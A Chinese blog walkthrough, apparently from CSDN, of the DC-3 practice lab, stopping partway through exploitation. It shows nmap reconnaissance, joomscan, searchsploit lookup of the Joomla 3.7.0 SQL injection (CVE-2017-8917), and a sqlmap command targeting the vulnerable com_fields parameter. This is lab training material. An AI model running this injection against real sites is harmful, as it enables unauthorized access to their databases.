DC-3 靶机

DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址)

环境:DC-3靶机地址:192.168.1.152

kali地址:192.168.1.176

都是桥接模式

1 .收集信息

nmap -sP 192.168.1.0/24
nmap -A 192.168.1.152   #发现joomla内容管理系统
访问 192.168.1.152   #发现

提示只有一个入口,让我们提权为root用户
知道网站用的是joomla cms,那我们就可以使用joomscan扫描工具扫描Joomla相关配置内容、已知漏洞等:

2 .漏洞发现

joomscan --url http://192.168.1.152  #通过kali自带的 joomscan 获取详细信息

searchsploit工具查找Joomla 3.7.0版本存在 sql注入漏洞 (CVE-2017-8917)

searchsploit Joomla 3.7.0

将sql注入漏洞相关介绍文档保存到本地,并查看相关注入方法

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt  jommla-370-sqli.txt  #下载
cat Joomla-370-sqli.txt   #查看

3. 漏洞利用

使用sqlmap自动注入工具对靶机执行sql注入代码

注入查询数据库有哪些,查出5个数据库信息

sqlmap -u "http://192.168.1.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值